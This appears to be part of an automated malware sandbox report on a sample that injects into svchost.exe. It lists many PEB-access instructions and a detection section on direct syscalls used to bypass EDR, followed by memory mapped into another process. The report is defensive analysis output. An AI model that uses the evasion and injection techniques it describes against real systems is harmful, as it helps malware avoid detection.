                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]2_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]2_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]2_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]2_2_0305E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]2_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]2_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]2_2_03032F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]2_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]2_2_0305EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4F42 mov eax, dword ptr fs:[00000030h]2_2_030D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h]2_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF50 mov eax, dword ptr fs:[00000030h]2_2_0306CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D0F50 mov eax, dword ptr fs:[00000030h]2_2_030D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305AF69 mov eax, dword ptr fs:[00000030h]2_2_0305AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305AF69 mov eax, dword ptr fs:[00000030h]2_2_0305AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2F60 mov eax, dword ptr fs:[00000030h]2_2_030D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2F60 mov eax, dword ptr fs:[00000030h]2_2_030D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104F68 mov eax, dword ptr fs:[00000030h]2_2_03104F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF80 mov eax, dword ptr fs:[00000030h]2_2_0306CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062F98 mov eax, dword ptr fs:[00000030h]2_2_03062F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062F98 mov eax, dword ptr fs:[00000030h]2_2_03062F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC8 mov eax, dword ptr fs:[00000030h]2_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC8 mov eax, dword ptr fs:[00000030h]2_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC8 mov eax, dword ptr fs:[00000030h]2_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC8 mov eax, dword ptr fs:[00000030h]2_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302EFD8 mov eax, dword ptr fs:[00000030h]2_2_0302EFD8
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_006A80A9
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067A155
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067A124 SetUnhandledExceptionFilter,0_2_0067A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
